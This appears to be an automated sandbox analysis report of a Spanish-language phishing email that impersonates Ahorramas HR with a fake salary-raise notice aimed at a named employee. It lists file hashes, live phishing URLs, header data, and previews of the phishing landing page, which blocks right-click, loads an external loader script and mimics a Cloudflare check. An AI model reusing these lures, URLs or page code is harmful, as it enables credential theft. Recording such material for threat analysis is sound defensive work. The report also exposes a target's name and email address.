                                    Preview:window._cf_chl_opt={cFPWv:'b'};~function(V,h,i,j,k,o,s,x){V=b,function(d,e,U,f,g){for(U=b,f=d();!![];)try{if(g=parseInt(U(471))/1*(parseInt(U(523))/2)+-parseInt(U(508))/3*(parseInt(U(500))/4)+parseInt(U(479))/5+-parseInt(U(551))/6*(-parseInt(U(475))/7)+-parseInt(U(476))/8*(parseInt(U(491))/9)+parseInt(U(558))/10*(parseInt(U(555))/11)+parseInt(U(545))/12,e===g)break;else f.push(f.shift())}catch(D){f.push(f.shift())}}(a,268906),h=this||self,i=h[V(543)],j={},j[V(482)]='o',j[V(473)]='s',j[V(497)]='u',j[V(539)]='z',j[V(542)]='n',j[V(510)]='I',j[V(554)]='b',k=j,h[V(469)]=function(g,D,E,F,a0,H,I,J,K,L,M){if(a0=V,D===null||void 0===D)return F;for(H=n(D),g[a0(549)][a0(448)]&&(H=H[a0(506)](g[a0(549)][a0(448)](D))),H=g[a0(547)][a0(505)]&&g[a0(538)]?g[a0(547)][a0(505)](new g[(a0(538))](H)):function(N,a1,O){for(a1=a0,N[a1(458)](),O=0;O<N[a1(511)];N[O+1]===N[O]?N[a1(463)](O+1,1):O+=1);return N}(H),I='nAsAaAb'.split('A'),I=I[a0(454)][a0(535)](I),J=0;J<H[a0(511)];K=H[J],L=m(g,D,K),I(L)?(M='s'===L&&!g[
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 2905
                                    Category:dropped
                                    Size (bytes):1173
                                    Entropy (8bit):7.811199816788843
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:5C7ACF60A2ACAA5C54BF2B2EC6D484D8
                                    SHA1:F1837FD5DB6DAD498148D7D77438DE693114B042
                                    SHA-256:EE21196A4F5EF64135B7998E58F1E7210608674E3FDF97B328C1C237E3B184DB
                                    SHA-512:11516935B1C777D6457B7FB44235F8C8A73BA1313AC8607C16D342EECAE22AE5BFD702CE01DBB2DC63C3D480E89A689C7AA6CAC8D822E306B413534FEE770A77
                                    Malicious:false
                                    Reputation:unknown
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (8115), with no line terminators
                                    Category:downloaded
                                    Size (bytes):8115
                                    Entropy (8bit):5.762647835689092
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:6E9C93C478043B05C1ACA7C797ED2F3F
                                    SHA1:07A0ABF2D7870B3490D5B2D7777C8C85C90FA455
                                    SHA-256:73827BF5979EE340B9688ACDBCCA0A441D2FE56FB835E22F97A1C9F19FCE1757
                                    SHA-512:8BE50D654D452EF8A02347FD511E0D4CC4A18B145C4AD29AC6685C1A51819EC569B7B91391C24A0E6479E17EA35F0C278A07E556B34D0C5CBA4AF1744E40B606
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://tdmmv2467vengtbhl3e.citq.de/cdn-cgi/challenge-platform/h/b/scripts/jsd/22755d9a86c9/main.js?
                                    Preview:window._cf_chl_opt={cFPWv:'b'};~function(V,h,i,n,o,s,z,A){V=b,function(c,d,U,e,f){for(U=b,e=c();!![];)try{if(f=-parseInt(U(362))/1+parseInt(U(410))/2*(parseInt(U(417))/3)+-parseInt(U(408))/4*(-parseInt(U(366))/5)+parseInt(U(381))/6+-parseInt(U(404))/7+-parseInt(U(370))/8*(parseInt(U(435))/9)+parseInt(U(336))/10*(parseInt(U(431))/11),f===d)break;else e.push(e.shift())}catch(D){e.push(e.shift())}}(a,382826),h=this||self,i=h[V(427)],n=function(a0,d,e,f){return a0=V,d=String[a0(433)],e={'h':function(D){return D==null?'':e.g(D,6,function(E,a1){return a1=b,a1(415)[a1(342)](E)})},'g':function(D,E,F,a2,G,H,I,J,K,L,M,N,O,P,Q,R,S,T){if(a2=a0,D==null)return'';for(H={},I={},J='',K=2,L=3,M=2,N=[],O=0,P=0,Q=0;Q<D[a2(402)];Q+=1)if(R=D[a2(342)](Q),Object[a2(368)][a2(350)][a2(421)](H,R)||(H[R]=L++,I[R]=!0),S=J+R,Object[a2(368)][a2(350)][a2(421)](H,S))J=S;else{if(Object[a2(368)][a2(350)][a2(421)](I,J)){if(256>J[a2(335)](0)){for(G=0;G<M;O<<=1,P==E-1?(P=0,N[a2(337)](F(O)),O=0):P++,G++);for(T=J[a2(335)](0)
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                    Category:downloaded
                                    Size (bytes):61
                                    Entropy (8bit):3.990210155325004
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                    SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                    SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                    SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1
                                    Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:HTML document, ASCII text, with very long lines (955), with CRLF, LF line terminators
                                    Category:downloaded
                                    Size (bytes):1858
                                    Entropy (8bit):5.2433136398609745
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:1AEC881262ED2076E4591D8F98CAD2B1
                                    SHA1:6C9A4C0672984A96E3646E37B9A8276B2A8BEA82
                                    SHA-256:DCBC358C144A853E772B1DCB2B6CCD360DB3446923752AC5489CC447BA971F86
                                    SHA-512:72B059651CB673BC860B533101A3FDF138D57E75D77670C870A4549D357D3FB34773F39F34670E355B1D8C7FA782A45C5EE91795AFD6C5CEA47C1E9BE08E49F2
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://ahorramas-5ocglii6fvrlmr.wroy.de/8no1e5mntj0ymfgylfo3/7nyedabhzveba2a8xZ2VuL3REbW1WL3ZFbmdUQkhsM2UvRmVybmFuZG8uYmF0dWVjYXMvMjQ2Ny9haG9ycmFtYXMuY29tL1hlNm1wQWRJQUFjdXhVNkh5enZr
                                    Preview:. <!DOCTYPE html>. <html>. <head>. <script>. document.addEventListener("keydown", function(event) {. if (event.ctrlKey) {. event.preventDefault();. }. });. document.addEventListener('contextmenu', event => event.preventDefault());. </script>. </head>. <body>. <html dir="ltr" class="" landing="Fernando.batuecas@ahorramas.com" lang="en">.. <head>.. <meta common="loDRmTWg3JhsJ2iHiowikiL2Njc3B0ZGZidmRmZGJkZmJmYmRnM2d2ZnJnNGg0NDNkNDM=ikiwoiloDRmTWg3JhsJ2iH" redirme="inikihttps://outlook.office.com/mailikiwiiloDRmTWg3JhsJ2iH">.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>.. <script src="https://cdn.jsdelivr.net/gh/mecolo123/coke-load@main/loader.js"></script>... <script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createEleme
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                    Category:downloaded
                                    Size (bytes):621
                                    Entropy (8bit):7.673946009263606
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:4761405717E938D7E7400BB15715DB1E
                                    SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                    SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                    SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://aadcdn.msauth.net/shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (8014), with no line terminators
                                    Category:dropped
                                    Size (bytes):8014
                                    Entropy (8bit):5.7649861386742405
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:13BE7773E553F7F1E86F3945152B6EEC
                                    SHA1:97660BFEE8722CDCA78E37A12C212C07AF96CD69
                                    SHA-256:39ABC2405E6C4DC0381362222C559879D2B14C3B9312D22DCF8BFC7638A2765E
                                    SHA-512:7010A360C7604D52C12F415BE42324140E951FE75B2557911709973B3CD70EF49D37D8D646733782FD76925C1AACDBB912265DE863AAB2146BEF22FC65795397
                                    Malicious:false
                                    Reputation:unknown
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
                                    Category:dropped
                                    Size (bytes):2407
                                    Entropy (8bit):7.900400471609788
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:9D372E951D45A26EDE2DC8B417AAE4F8
                                    SHA1:84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
                                    SHA-256:4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
                                    SHA-512:78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
                                    Malicious:false
                                    Reputation:unknown
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:PNG image data, 39 x 2, 8-bit/color RGB, non-interlaced
                                    Category:downloaded
                                    Size (bytes):61
                                    Entropy (8bit):3.969798475032601
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:E7CF9D0667462392575F0740DD1FC46F
                                    SHA1:05EF72D719E8C2ADA85891D922AE890380C4F680
                                    SHA-256:351C2A684EAFB23F8F75325A811AB7D4140F5C5653DEB142E1A2A7078C0578FC
                                    SHA-512:0B0AC57067F6936EF7B359654C7BF09C97E7FAAB67DDE5631FAA583BDE778BC1BA2EA87C423320A8E3702E2870858D78F7BAC9502F0DB8508963BEB724FEA5AE
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8e2e658288a72e19/1731664852902/pwbkRyp6Rdg5_uU
                                    Preview:.PNG........IHDR...'.........T.R.....IDAT.....$.....IEND.B`.
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (8108), with no line terminators
                                    Category:downloaded
                                    Size (bytes):8108
                                    Entropy (8bit):5.764193675977358
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:C267461238E45EC4AAC0582937B125B1
                                    SHA1:254D6CDA9A3818B4F79793B713D6F57BE22971F2
                                    SHA-256:120B499FD78946E70C4E74AC5EF9522894AB3EA0D3F7B97604DC357F2BF9131F
                                    SHA-512:2CF98F5968D98E525A51B9B316062D04EE9A6A35B5338C14F048A47EB8EC2DB889467286D6F008ECCEA7BCA1B7154F59ACAD31E20DBB466305A01F95EF0ED15C
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://ahorramas-5ocglii6fvrlmr.wroy.de/cdn-cgi/challenge-platform/h/b/scripts/jsd/22755d9a86c9/main.js?
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:HTML document, ASCII text, with very long lines (951)
                                    Category:downloaded
                                    Size (bytes):7146
                                    Entropy (8bit):4.424595527806386
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:5EE0EA2C254CE775BBA1AC75F192DA6A
                                    SHA1:27996E69E602744F0C886845F25F64605248E93E
                                    SHA-256:772999803B72431CE328EA23F37F334E66759B61B5FDD0F55422290505A2CC03
                                    SHA-512:A6C6E21E3F655426C3D05BA2A8BB1816B63C9DF5B47FD7C2966F948836EDE470563BF4A2D08C77F28EBA8282EB30FEFFFC1B98D946A0D329CCD7C916D2192442
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://tdmmv2467vengtbhl3e.citq.de/tDmmV/vEngTBHl3e/Xe6mpAdIAAcuxU6Hyzvk1b7xgen/tDmmV/vEngTBHl3e/Fernando.batuecas/2467/ahorramas.com/ahorramas.com
                                    Preview:<!doctype html>. <html lang="en-US">. <head>. <script async defer src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback"></script>. <title>Ahorramas.Com Verifing...</title>. <meta content="width=device-width,initial-scale=1" name=viewport>. <script>. var verifyCallback_CF = function (response) {. var cfForm = document.querySelector("#cfForm");. if (response && response.length > 10) {. cfForm.submit();. return;. }. };. window.onloadTurnstileCallback = function () {. turnstile.render("#turnstileCaptcha", {. sitekey: "0x4AAAAAAAz4efDGx1QOD-bE",. callback: verifyCallback_CF,. });. };. </script>. <style>. .h1, .h2 {. font-weight: 500;. }. * {. box-sizing: border-box;. margin: 0;. padding: 0;.
                                    File type:RFC 822 mail, ASCII text, with very long lines (309), with CRLF line terminators
                                    Entropy (8bit):6.042894654992791
                                    TrID:
                                    • E-Mail message (Var. 5) (54515/1) 100.00%
                                    File name:704b67b5-6bc9-dbd5-0710-60eb98e03983.eml
                                    File size:15'821 bytes
                                    MD5:348b6a46a2bf44ee4bdc077ce4fae7c8
                                    SHA1:ce01869c074679099fbf7dbcfa12761222a9d0e2
                                    SHA256:5459a8aa83420fb1e0415d196aa163e58abeba21c8f4f1e1888a255a528b0265
                                    SHA512:01b30c6742161f63fd8b46f83a5d08405ffed10062104855c3718a5818180a52f947fc72cb77d01b29be2caec0743ca95ac5a46663adb126d1922265746eee67
                                    SSDEEP:192:RZG3FfY0BYKJFFAkCXtI+FYCbmNbu5hFYhVc5ONbRKu9veGpPBeFP4FqAyTkfA48:R03Zx+mQKZRveGpPBeFP4FqAyUA0w
                                    TLSH:FE62E611AE071C57C7A0558A18DD0DC9415CBB86F4BBA0A4281FF67E51CE2BF2CF4DAA
                                    File Content Preview:Received: from DUZPR01CA0004.eurprd01.prod.exchangelabs.com.. (2603:10a6:10:3c3::20) by VI0P189MB2649.EURP189.PROD.OUTLOOK.COM.. (2603:10a6:800:23b::11) with Microsoft SMTP Server (version=TLS1_2,.. cipher=TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384) id 15.20.8
                                    Subject:Ahorramas RR.HH.: Notificacin de Mejora Salarial
                                    From:Administrador Ahorramas <Billing.kfil@denasabuildcon.com>
                                    To:fernando.batuecas@ahorramas.com
                                    Cc:
                                    BCC:
                                    Date:Thu, 14 Nov 2024 17:46:13 -1200
                                    Communications:
                                    • Detalles del Aumento Salarial - Noviembre 2024 La identidad de este remitente est confirmada por la lista de remitentes de confianza. Documento Recibido Departamento de Recursos Humanos REVISAR DOCUMENTO https://tDmmV2467vEngTBHl3e.citq.de/tDmmV/vEngTBHl3e/Xe6mpAdIAAcuxU6Hyzvk1b7xgen/tDmmV/vEngTBHl3e/Fernando.batuecas/2467/ahorramas.com/Xe6mpAdIAAcuxU6Hyzvk Estimado/a Fernando.batuecas, A continuacin, encontrar los detalles de la hoja de tiempo y su aumento salarial para el mes de Noviembre de 2024. ahorramas.com/Aumento-Salarial-Noviembre https://tDmmV2467vEngTBHl3e.citq.de/tDmmV/vEngTBHl3e/Xe6mpAdIAAcuxU6Hyzvk1b7xgen/tDmmV/vEngTBHl3e/Fernando.batuecas/2467/ahorramas.com/Xe6mpAdIAAcuxU6Hyzvk Si tiene alguna consulta, por favor contacte al Departamento de Nmina de Ahorramas. Atentamente, Ahorramas Administrador de Nmina de Director de Nmina y RR.HH. | Sede Central https://www.ahorramas.com Message ID: vEngTBHl3e69837tDmmV7099446787
                                    Attachments:
                                      Key Value
                                      Received from [37.46.113.218] (port=49559 helo=[10.27.18.98]) by srv.cybaimtech.in with esmtpsa (TLS1.2) tls TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (Exim 4.96.2) (envelope-from <Billing.kfil@denasabuildcon.com>) id 1tBpA2-0003wF-0p for fernando.batuecas@ahorramas.com; Fri, 15 Nov 2024 11:16:24 +0530
                                      Authentication-Results spf=pass (sender IP is 103.177.225.180) smtp.mailfrom=denasabuildcon.com; dkim=fail (signature did not verify) header.d=denasabuildcon.com;dmarc=bestguesspass action=none header.from=denasabuildcon.com;compauth=pass reason=109
                                      Received-SPF Pass (protection.outlook.com: domain of denasabuildcon.com designates 103.177.225.180 as permitted sender) receiver=protection.outlook.com; client-ip=103.177.225.180; helo=srv.cybaimtech.in; pr=C
                                      DKIM-Signature v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed; d=denasabuildcon.com; s=default; h=Content-Transfer-Encoding:Subject:From:To: Date:MIME-Version:Content-Type:Sender:Reply-To:Message-ID:Cc:Content-ID: Content-Description:Resent-Date:Resent-From:Resent-Sender:Resent-To:Resent-Cc :Resent-Message-ID:In-Reply-To:References:List-Id:List-Help:List-Unsubscribe: List-Subscribe:List-Post:List-Owner:List-Archive; bh=I1SWxHP9IEjzV03XVi0xNoL0vmh7fAg2qg4ohUcmlEA=; b=Nzs6oZYbNAe17BXdMyUeeD+GEA gKD180gJVBWt41QnwY+I+uehyNMUXr4Kgkso0vlKyXfW/GT96f8YOMAekMGULiKfGusz/gS1HX+jS LKDXvPK6lefMvD8UNN4mUOP4EgylKwurSgG9ffe5Qj+frkXqh/M2Wp0ftdrVEj5Uo9tTKYTrj2h5e 5kr74X4rREOMZgETsqrOt6hN/LUtPb/7ot1wCPNiu0ioGcpDjkGHehucUuTFXFxO17Esuqsx++cFR MJMp6duFOdgq76MO3Tliz0WAlKNfUAOwPTBdzujJ/8ii4H8w6L9qTE+wXiTDQJ0W7ReG/090Z1hf+ vOYCIKtg==;
                                      Content-Type multipart/mixed; boundary="===============1437729934825352842=="
                                      MIME-Version 1.0
                                      Date Thu, 14 Nov 2024 17:46:13 -1200
                                      To fernando.batuecas@ahorramas.com
                                      From Administrador Ahorramas <Billing.kfil@denasabuildcon.com>
                                      Subject Ahorramas RR.HH.: Notificacin de Mejora Salarial
                                      Content-Transfer-Encoding 8Bbit
                                      X-Priority 1
                                      X-MSMail-Priority High
                                      X-Mailer Microsoft
                                      Accept-Language en-US
                                      Content-Language en-US
                                      X-AntiAbuse Sender Address Domain - denasabuildcon.com
                                      X-Get-Message-Sender-Via srv.cybaimtech.in: authenticated_id: billing.kfil@denasabuildcon.com
                                      X-Authenticated-Sender srv.cybaimtech.in: billing.kfil@denasabuildcon.com
                                      X-Source
                                      X-Source-Args
                                      X-Source-Dir
                                      Message-ID <98466892-183b-4b83-84b5-98a34ecc9288@DU2PEPF00028CFF.eurprd03.prod.outlook.com>
                                      Return-Path Billing.kfil@denasabuildcon.com
                                      X-EOPAttributedMessage 0
                                      X-EOPTenantAttributedMessage 4eb911de-063e-41cb-bcf9-71aabf223544:0
                                      X-MS-PublicTrafficType Email
                                      X-MS-TrafficTypeDiagnostic DU2PEPF00028CFF:EE_|VI0P189MB2649:EE_
                                      X-MS-Office365-Filtering-Correlation-Id 21da436a-11c8-4f17-3690-08dd0538d8d1
                                      X-MS-Exchange-AtpMessageProperties SA|SL
                                      X-Forefront-Antispam-Report CIP:103.177.225.180;CTRY:IN;LANG:es;SCL:8;SRV:;IPV:NLI;SFV:SPM;H:srv.cybaimtech.in;PTR:srv.cybaimtech.in;CAT:HPHISH;SFTY:9.25;SFS:(13230040)(5073199012)(5063199012)(4123199012)(2092899012)(3072899012)(12012899012)(5062899012)(69100299015)(1032899013)(2066899003)(4076899003)(8096899003)(43540500003);DIR:INB;
                                      X-Microsoft-Antispam BCL:0;ARA:13230040|5073199012|5063199012|4123199012|2092899012|3072899012|12012899012|5062899012|69100299015|1032899013|2066899003|4076899003|8096899003|43540500003;
                                      X-Microsoft-Antispam-Message-Info

                                      Icon Hash:46070c0a8e0c67d6